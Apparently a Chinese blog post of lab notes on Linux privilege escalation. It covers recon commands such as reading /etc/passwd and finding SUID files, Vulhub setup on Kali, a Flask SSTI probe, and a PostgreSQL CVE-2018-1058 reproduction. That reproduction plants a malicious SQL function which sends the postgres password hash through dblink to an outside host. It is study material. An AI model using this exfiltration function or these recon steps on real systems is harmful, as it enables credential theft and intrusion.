linux提权
内核漏洞提权
内核漏洞提权是指普通用户访问操作系统内核,利用内核漏洞将权限提升到root权限。通常内核漏洞提权步骤如下:
(1)信息收集,例如查看当前用户权限、查看系统版本和内核版本
(2)根据收集到的信息查找EXP
(3)使用EXP提权
1.信息收集常用命令
查看系统全部信息 uname -a 查看内核版本 uname -r 查看内核信息 cat /proc/version 查看CentOS版本 cat /etc/*-release 查看Ubuntu和Debian版本 cat /etc/issue 查看RedHat版本 cat /etc/redhat-release 查看当前用户 whoami 查看当前用户ID id 查看环境变量 env 显示当前PATH环境变量 echo $PATH 列出系统上的所有用户 cat /etc/passwd 查找UID为0的用户 awk-F:'($3==0){print$1}' /etc/passwd 查找设置了SUID的文件 find /-user root -perm -4000 -exec ls -ldb {} \;
和我之前写的权限提升中的window提权相同
当时我认为我使用的ubuntu系统是存在漏洞的不知,进行了复现,但结果失败于是有了安装vmtools和复现的过程
1.在Ubuntu上创建一个低权限用户test并设置密码
useradd -d /home/test -m test
passwd test
2.然后切换到test用户,查看系统内核版本是否小于5.1.17,并当前用户和当前用户的UID
使用git clone https://github.com/bcoles/kernel-exploits.git
我的ubuntu没有办法使用故采用vmtools下载文件
Ubuntu—VMwaretools安装
打开虚拟机VMware Workstation,启动Ubuntu系统,菜单栏 - 虚拟机 - 安装VMware Tools,不启动Ubuntu系统是无法点击“安装VMware Tools”选项的,如下图:
上面的操作后就开始安装VMware Tools了,根据其提示输入yes/no,直到出现Enjoy, –the VMware team如下图,就表示安装成功了,然后手动重启虚拟机:
一顿
重启虚拟机后我们发现菜单栏 - 虚拟机 - 安装VMware Tools变成了“重新安装”字眼,这也表明VMware Tools已经安装成功了:
报错权限拒绝
报错权限拒绝,有哪位研究的可以讨论
kali2021.1下载vulhub
由于上诉提权失败故有了下载vulhub直接对某提权漏洞进行复现
先看下文中的KAL更新源错误在于多更新列表与软件包进行更新源在安装
启动后选择start installer进行设置时区、账号、分区、语言等重新启动后会输入你设置的账号和密码;我的账号guiltyfet进行登录
Kali 安装Vulhub前首先更新添加国内源要不不成功。
更新源 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io 查看版本 docker -v 显示docker信息 docker ps -a 安装docker-compose pip3 install docker-compose 查看docker-compose版本 docker-compose -v 下载Vulhub git clone https://github.com/vulhub/vulhub.git 启动环境 systemctl status docker -l 查看 docker-compose ps 关闭 docker-compose down
systemctl status docker.service 1 ⨯ ● docker.service - Docker Application Container Engine Loaded: loaded (/lib/systemd/system/docker.service; enabled; vendor pre> Active: failed (Result: exit-code) since Tue 2021-06-01 15:27:46 CST; 5> TriggeredBy: ● docker.socket Docs: https://docs.docker.com Process: 1311 ExecStart=/usr/sbin/dockerd -H fd:// $DOCKER_OPTS (code=ex> Main PID: 1311 (code=exited, status=1/FAILURE) CPU: 61ms 6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Failed with result 'ex> 6月 01 15:27:46 guiltyfet systemd[1]: Failed to start Docker Application Con> 6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Scheduled restart job,> 6月 01 15:27:46 guiltyfet systemd[1]: Stopped Docker Application Container E> 6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Start request repeated> 6月 01 15:27:46 guiltyfet systemd[1]: docker.service: Failed with result 'ex> 6月 01 15:27:46 guiltyfet systemd[1]: Failed to start Docker Application Con> 6月 01 15:28:10 guiltyfet systemd[1]: docker.service: Start request repeated> 6月 01 15:28:10 guiltyfet systemd[1]: docker.service: Failed with result 'ex> 6月 01 15:28:10 guiltyfet systemd[1]: Failed to start Docker Application Con>
KAL更新源错误在于多更新列表与软件包
#linux内核更新
apt-get install linux-headers-$(uname -r)
apt-get clean //清除缓存索引
apt-get update //更新索引文件
apt-get upgrade //更新实际的软件包文件
apt-get dist-upgrade //根据依赖关系更新
开始更新软件列表和更新软件;
apt-getupdate & apt-get upgrade
更新完成后再次输入软件升级;
apt-get dist-upgrade
清理
apt-get clean
重启系统
reboot
修改软件源APT-sources.list
vim /etc/apt/sources.list
Kali 2.0替换APT更新源为国内源并更新系统
然后选择适合自己较快的源:
#中科大kali源
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里云kali源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
Kali 2.0替换APT更新源为国内源并更新系统
3、对软件进行一次整体更新:
apt-get update & apt-get upgrade
apt-get dist-upgrade
apt-get clean
(root💀guiltyfet)-[/home/guiltyfet] └─# curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add - Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)). OK ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# sudo add-apt-repository \ "deb [arch=amd64] https://download.docker.com/linux/ubuntu \$(lsb_release -cs) \stable" sudo: add-apt-repository:找不到命令 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# sudo apt-get install docker-ce 1 ⨯ 正在读取软件包列表... 完成 正在分析软件包的依赖关系树... 完成 正在读取状态信息... 完成 没有可用的软件包 docker-ce,但是它被其它的软件包引用了。 这可能意味着这个缺失的软件包可能已被废弃, 或者只能在其他发布源中找到 E: 软件包 docker-ce 没有可安装候选 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# apt-get install -y apt-transport-https ca-certificates 100 ⨯ 正在读取软件包列表... 完成 正在分析软件包的依赖关系树... 完成 正在读取状态信息... 完成 apt-transport-https 已经是最新版 (2.2.3)。 ca-certificates 已经是最新版 (20210119)。 下列软件包是自动安装的并且现在不需要了: python-babel-localedata python3-babel 使用'apt autoremove'来卸载它(它们)。 升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# apt install docker.io 正在读取软件包列表... 完成 正在分析软件包的依赖关系树... 完成 正在读取状态信息... 完成 docker.io 已经是最新版 (20.10.5+dfsg1-1+b1)。 下列软件包是自动安装的并且现在不需要了: python-babel-localedata python3-babel 使用'apt autoremove'来卸载它(它们)。 升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker -v Docker version 20.10.5+dfsg1, build 55c4c88 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# systemctl start docker ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker ps -a CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# apt-get install python3-pip 正在读取软件包列表... 完成 正在分析软件包的依赖关系树... 完成 正在读取状态信息... 完成 python3-pip 已经是最新版 (20.3.4-2)。 python3-pip 已设置为手动安装。 下列软件包是自动安装的并且现在不需要了: python-babel-localedata python3-babel 使用'apt autoremove'来卸载它(它们)。 升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 0 个软件包未被升级。 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# pip3 install docker-compose Requirement already satisfied: docker-compose in /usr/local/lib/python3.9/dist-packages (1.29.2) Requirement already satisfied: texttable<2,>=0.9.0 in /usr/lib/python3/dist-packages (from docker-compose) (1.6.3) Requirement already satisfied: jsonschema<4,>=2.5.1 in /usr/lib/python3/dist-packages (from docker-compose) (3.2.0) Requirement already satisfied: requests<3,>=2.20.0 in /usr/lib/python3/dist-packages (from docker-compose) (2.25.1) Requirement already satisfied: PyYAML<6,>=3.10 in /usr/lib/python3/dist-packages (from docker-compose) (5.3.1) Requirement already satisfied: dockerpty<1,>=0.4.1 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.4.1) Requirement already satisfied: distro<2,>=1.5.0 in /usr/lib/python3/dist-packages (from docker-compose) (1.5.0) Requirement already satisfied: docker[ssh]>=5 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (5.0.0) Requirement already satisfied: python-dotenv<1,>=0.13.0 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.17.1) Requirement already satisfied: websocket-client<1,>=0.32.0 in /usr/lib/python3/dist-packages (from docker-compose) (0.57.0) Requirement already satisfied: docopt<1,>=0.6.1 in /usr/local/lib/python3.9/dist-packages (from docker-compose) (0.6.2) Requirement already satisfied: paramiko>=2.4.2 in /usr/lib/python3/dist-packages (from docker[ssh]>=5->docker-compose) (2.7.2) Requirement already satisfied: six>=1.3.0 in /usr/lib/python3/dist-packages (from dockerpty<1,>=0.4.1->docker-compose) (1.16.0) ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker-compose -v docker-compose version 1.29.2, build unknown ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# git clone https://github.com/vulhub/vulhub.git fatal: 目标路径 'vulhub' 已经存在,并且不是一个空目录。 ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# cd /vulhub/flask/ssti 128 ⨯ cd: 没有那个文件或目录: /vulhub/flask/ssti ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# cd /vulhub 1 ⨯ cd: 没有那个文件或目录: /vulhub ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# ls 1 ⨯ 公共 模板 视频 图片 文档 下载 音乐 桌面 vulhub ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# cd vulhub ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub] └─# cd flask/ssti ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti] └─# docker-compose build web uses an image, skipping ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti] └─# docker-compose up -d Creating network "ssti_default" with the default driver Pulling web (vulhub/flask:1.1.1)... 1.1.1: Pulling from vulhub/flask c7b7d16361e0: Pull complete b7a128769df1: Pull complete 1128949d0793: Pull complete 667692510b70: Pull complete bed4ecf88e6a: Pull complete 94d1c1cbf347: Pull complete ac097723595b: Pull complete e7028784d190: Pull complete 16fffdb8dec4: Pull complete 20a91e71c5f1: Pull complete Digest: sha256:20d202d35fe99818878a3f844362210a21894bfab57b8acf23dfa3ade9a87026 Status: Downloaded newer image for vulhub/flask:1.1.1 Creating ssti_web_1 ... done ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti] └─# docker-compose ps Name Command State Ports ---------------------------------------------------------------------------- ssti_web_1 /bin/sh -c gunicorn -w 4 - ... Up 0.0.0.0:8000->8000/tcp ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/flask/ssti] └─#
简单来个flaskssti漏洞漏洞复现
t = Template("hello " + name)
此处,函数利用get获取参数进入template,形成任意构造注入。
检验方法
构造:http://127.0.0.1:8000/?name={{1*9}}
(root💀guiltyfet)-[/home/…/vulhub/flask/ssti/src] └─# cat app.py from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __name__ == "__main__": app.run() ┌──(root💀guiltyfet)-[/home/…/vulhub/flask/ssti/src] └─# docker-compose down Stopping ssti_web_1 ... done Removing ssti_web_1 ... done Removing network ssti_default
提权未成功的postgres—CVE-2018-1058
(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058] └─# docker-compose up -d Creating network "cve-2018-1058_default" with the default driver Pulling postgres (vulhub/postgres:9.6.7)... 9.6.7: Pulling from vulhub/postgres 550fe1bea624: Pull complete e38742f30225: Pull complete a3070ac4b15d: Pull complete f08c1d225f05: Pull complete 95a4ac3fddb4: Pull complete 149901e1c6d7: Pull complete 2ef2a35c62db: Pull complete ad88186a11bf: Pull complete 51310786a9a6: Pull complete Digest: sha256:66c0bb2ba0398c311bcca0d6b9373c396decbb4eb6286435659b15ec334b4315 Status: Downloaded newer image for vulhub/postgres:9.6.7 Creating cve-2018-1058_postgres_1 ... done ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058] └─# psql --host 192.168.80.131 --username vulhub 用户 vulhub 的口令: psql (13.2 (Debian 13.2-1), 服务器 9.6.7) 输入 "help" 来获取帮助信息. vulhub=> vulhub=> help 您正在使用psql, 这是一种用于访问PostgreSQL的命令行界面. 键入: \copyright 显示发行条款 \h 显示 SQL 命令的说明 \? 显示 pgsql 命令的说明 \g 或者以分号(;)结尾以执行查询 \q 退出 vulhub=> \q
(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058] └─# psql --host 192.168.80.131 --username vulhub 用户 vulhub 的口令: psql (13.2 (Debian 13.2-1), 服务器 9.6.7) 输入 "help" 来获取帮助信息. vulhub=> CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$ vulhub$> select dblink_connect((select 'hostaddr=192.168.80.200 port=8888 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); vulhub$> SELECT pg_catalog.array_to_string($1,$2); vulhub$> $$ LANGUAGE SQL VOLATILE; CREATE FUNCTION vulhub=> docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub-> exit 使用\q 退出. vulhub-> \q ┌──(root💀guiltyfet)-[/home/guiltyfet/vulhub/postgres/CVE-2018-1058] └─# docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub pg_dump: [archiver (db)] query failed: ERROR: could not establish connection DETAIL: could not connect to server: Host is unreachable Is the server running on host "192.168.80.200" and accepting TCP/IP connections on port 8888? CONTEXT: SQL function "array_to_string" statement 1 pg_dump: [archiver (db)] query was: SELECT proretset, prosrc, probin, pg_catalog.pg_get_function_arguments(oid) AS funcargs, pg_catalog.pg_get_function_identity_arguments(oid) AS funciargs, pg_catalog.pg_get_function_result(oid) AS funcresult, array_to_string(protrftypes, ' ') AS protrftypes, proiswindow, provolatile, proisstrict, prosecdef, proleakproof, proconfig, procost, prorows, proparallel, (SELECT lanname FROM pg_catalog.pg_language WHERE oid = prolang) AS lanname FROM pg_catalog.pg_proc WHERE oid = '16432'::pg_catalog.oid
有点问题不太明白的点
退出:exit 然后我在192.168.244.134上监听5433端口,等待超级用户触发我们留下的这个“后门”,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。执行上述命令的同时,“后门”已被触发192.168.244.134机器上已收到敏感信息:
对于这步的实现没明白。希望有大佬解答!
